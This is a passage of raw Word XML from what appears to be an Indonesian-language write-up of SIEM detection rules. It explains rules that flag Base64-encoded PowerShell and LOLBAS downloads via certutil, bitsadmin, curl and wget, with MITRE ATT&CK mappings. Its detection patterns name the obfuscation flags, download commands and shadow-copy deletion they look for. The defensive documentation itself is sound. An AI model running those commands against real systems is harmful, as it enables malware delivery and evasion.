                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>blind to command-line parameters</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Melakukan inspeksi semantik mendalam terhadap argumen berbahaya (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-enc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-urlcache</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/priv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>delete shadows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w: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Pertahanan LOLBAS / LOLBins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Buta terhadap biner sah Windows/Linux yang disalahgunakan untuk mengunduh malware.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Mampu mengenali penyalahgunaan </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>certutil</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>bitsadmin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, dan </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> sebagai aksi </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (T1105).</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Kecepatan Deteksi Reverse Shell</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Penyerang dapat bercokol berbulan-bulan (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>high dwell time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>) sebelum aktivitas jaringan anomali disadari.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Deteksi Detik Pertama.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Eksekusi reverse shell interaktif langsung memicu tiket prioritas kritis Level 10 (P0).</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Resistensi Terhadap Obfuskasi</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Perintah PowerShell yang disamarkan dengan Base64 lolos dari pencarian kata kunci teks biasa.</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Mengenali seluruh flag obfuskasi (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-enc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-encodedcommand</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pwsh -enc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">) sebagai taktik </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (T1027).</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(ID 100100 – 100104)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Struktur file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>020-process.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dideklarasikan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020-process.xml</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Purpose: Process anomalies, LOLBAS execution, encoded PowerShell, suspicious shells</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Rule Range: 100100 - 100199</w:t>
              <w:br/>
              <w:t>--&gt;</w:t>
              <w:br/>
              <w:t>&lt;group name="process_execution,"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Berikut adalah dekomposisi komprehensif dari ke-5 rule deteksi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100100 — Base64 Encoded PowerShell Command Execution</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id="100100" level="7"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;base_normalized&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;match&gt;powershell.exe -enc|powershell.exe -encodedcommand|pwsh -enc&lt;/match&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;PROC: Base64 Encoded PowerShell command execution detected&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;process_execution,defense_evasion,powershell,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;mitre&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1059.001&lt;/id&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1027&lt;/id&gt;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100100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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (High Operational Warning)</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p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>T1059.001:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Command and Scripting Interpreter: PowerShell*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>T1027:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Obfuscated Files or Information*</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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mewarisi event Windows EventChannel dan Linux Syslog yang dinormalisasi di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>001-base-normalization.xml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powershell.exe -enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>powershell.exe -encodedcommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Parameter eksekusi string terenkripsi Base64 pada PowerShell Windows standar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pwsh -enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Parameter eksekusi string Base64 pada PowerShell Core lintas platform (Linux/macOS/Windows).</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100100 memonitor variabel command-line proses (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>win.eventdata.commandLine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada Sysmon/Auditd). Ketika sebuah proses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dijalankan dengan menyertakan argumen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau sinonimnya, sistem operasi akan mengeksekusi payload biner yang telah dienkripsi dalam format string Unicode Base64. Rule ini langsung menangkap pemanggilan flag tersebut dan menetapkan status </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Level 7</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upaya penyembunyian kode instruksi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Code Obfuscation / Defense Evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Menandai proses PowerShell yang berupaya melewati pemeriksaan keamanan signature teks biasa (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Antivirus String Inspection Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Memberikan peringatan dini sebelum skrip yang didekodekan mengeksekusi muatan berbahaya di dalam memori (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>In-Memory Execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D. Alasan Pembuatan &amp; Urgensi Keamanan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell adalah bahasa otomasi resmi Microsoft, namun parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-EncodedCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hampir tidak pernah digunakan oleh software bisnis normal dalam operasional harian. Sebaliknya, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>lebih dari 80% serangan siber berbasis Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (termasuk loader Cobalt Strike, Emotet, dan ransomware modern) menggunakan parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> untuk menyembunyikan script download atau injeksi shellcode. Rule ini memotong taktik tersebut tepat pada saat proses dipanggil.</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100101 — LOLBAS Command-Line Download Utility (Ingress Tool Transfer)</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id="100101" level="8"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;base_normalized&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;match&gt;certutil -urlcache|bitsadmin /transfer|curl -s http|wget -q http&lt;/match&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;PROC: LOLBAS Command-line download utility executed (Ingress Tool Transfer)&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;process_execution,ingress_tool_transfer,lolbas,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;mitre&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1105&lt;/id&gt;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100101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Threat Weaponization)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T1105 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Ingress Tool Transfer</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certutil -urlcache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Utilitas manajemen sertifikat Windows yang disalahgunakan untuk mengunduh file dari URL eksternal dan menyimpannya di cache lokal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bitsadmin /transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Utilitas Background Intelligent Transfer Service Windows yang disalahgunakan untuk mengunduh payload di latar belakang.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> `curl -s http` / `wget -q http`: Perintah download Linux/Windows yang dijalankan secara senyap (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>silent/quiet mode*) via protokol HTTP yang tidak terenkripsi.</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100101 memvalidasi eksekusi utilitas sistem yang tergolong dalam katalog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>LOLBAS (Living Off The Land Binaries and Scripts)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jika salah satu biner bawaan sistem tersebut dijalankan dengan parameter pengunduhan file dari internet, engine menandainya sebagai aktivitas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Ingress Tool Transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada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tahap pengunduhan senjata peretasan (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Staging / Weaponization Phase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) sesaat setelah peretas berhasil mendapatkan akses awal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Mencegah penyelundupan malware biner melalui jalur utilitas terpercaya yang sering kali diizinkan oleh kebijakan firewall lokal (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>AppLocker / Windows Defender Application Control Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Mengidentifikasi alamat IP server penyerang (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>C2 Drop Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) yang tertera pada argumen URL pengunduhan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D. Alasan Pembuatan &amp; Urgensi Arsitektural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Biner seperti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
